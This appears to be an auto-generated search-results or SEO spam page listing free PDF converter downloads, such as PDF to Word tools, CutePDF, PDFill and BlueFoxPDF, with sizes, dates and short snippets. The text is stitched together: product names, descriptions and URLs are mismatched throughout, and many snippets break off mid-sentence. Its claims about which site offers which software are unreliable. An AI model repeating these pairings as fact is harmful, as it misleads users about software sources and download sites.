OCR character 100% free. "Full conversion" will try to make an exact copy of the PDF. Solution: Use the OCR method!. Download 2007 Microsoft Office Add-in: Microsoft Save as PDF or www.bluefoxpdf.com/ May 17, 2016 This download allows you to export and save to the PDF and XPS formats in eight 2007 2007 Microsoft Office Add-in: Microsoft Save as PDF or XPS . 2007; Microsoft Office Publisher 2007; Microsoft Office Visio 2007; Microsoft Office Word 2007 Get the free email app for iOS, Android, and Windows. Free Print to PDF - Download ccm.net/download/download-572-free-pdf-to-word-converter Free Print to PDF latest version: PDF Printer produces prints from an Size: 8.6 MB; Developer: Free PDF Solutions more programs (17) . The program works to print a wide range of documents into PDF, namely Word, Excel, WordPad, . Free PDF to Powerpoint Converter - Download filehippo.com/software/office/pdf/2/ Free PDF to Powerpoint Converter latest version: Creating powerpoint presentation easily downloads: 1,943; Size: 10.9 MB; Developer: Free PDF Solutions more programs (17) Free Word to PDF Converter � Free PDF to Excel Converter. PDF to Word Converter for Mac - PDF to PowerPoint converter c4lpt.co.uk/directory-of-learning-performance-tools/pdf-tools/ PDF to Word Converter for Mac offers a perfect solution for Mac users to convert their PDF files to an editable MS Word. CutePDF - Convert to PDF for free, Free PDF Utilities, Save PDF www.tinypdf.com/ CutePDF allows you to create PDF files from any printable document, save FREE software for personal, commercial, gov or edu use. PDF Form Solutions. PDF Converter https://www.freepdfconvert.com/developers-api I could get by in "free" mode, and live forever with the unobtrusive sponsor page, workbooks, combining Excel and Word in the same file and many other uses. I am AMAZED that 24-hours after we started looking for PDF solutions we have . How to Convert PDF to Word on Mac: The Always Up-to-Date Guide https://www.iskysoft.com/pdf/ Aug 18, 2016 Here we will provide several solutions to convert PDF to word on Mac. Download the free trial of Cisdem PDF to Word Converter Now!. Software by Free PDF Solutions: Softonic www.pdfonline.com/pdf-to-word-converter/ List of software by Free PDF Solutions. Download Free Word to PDF Converter 2.50. License Convert Microsoft Word documents to Adobe PDF file format. 0. Top 5 PDF to MS Word Converters Download Available for Free https://www.recosoft.com/trial-software/ May 19, 2016 Top 5 PDF to MS Word Converters Download Available for Free is developed by BCL Technologies, known for their PDF solutions in the form . PDF | iSkysoft www.lifehack.org/articles//converting-pdf-to-word-files.html There are plenty of PDF solutions for you. Top 10 Tools to Free Transfer Word to PDF Online. If you are Top 10 Ways to Change Word to PDF Online for Free. Free PDF to Word Converter version 1.0.0 by Free PDF Solutions www.freepdfcreator.org/ Jun 18, 2016 The program is usually found in the C:Program Files (x86)Free PDF Solutions Free PDF to Word Converter directory. Take into account that . PDFill PDF Editor - Download www.fromdoctopdf.com/ PDFill PDF Editor, free and safe download. PDFill PDF Editor latest version: A complete solution for PDF editing. PDFill PDF Editor lets you read, edit and modify . FromDocToPDF https://answers.yahoo.com/question/index?qid You can use this PDF to Word FREE download to seamlessly convert PDFs to Word. This PDF convert download is the perfect solution for quickly ironing out . BlueFoxPDF Software - Total Solution of PDF Conversion - Convert https://docupub.com/ BlueFoxPDF provides many PDF converters to convert PDF to Word, Excel, HTML, BlueFox Free PDF to JPG Converter - Convert PDF to JPG, PNG, BMP and . Converting PDF to Word: Best 20 PDF Editor for PC, Mac and Mobile https://discussions.apple.com/thread/3993768?tstart=0 Sep 18, 2016 Nitro Pro PDF Editor [Desktop, Cloud]; Their Online free PDF to word converter Some of the striking features of able2extract 10 PDF solution . Free Business Plan Templates - PDF and Word - BusinessNewsDaily www.pdfforge.org/pdfarchitect Apr 5, 2016 Here's a list of free business plan templates you can create online or Find. A Solution . Score's free PDF and Word business plan templates.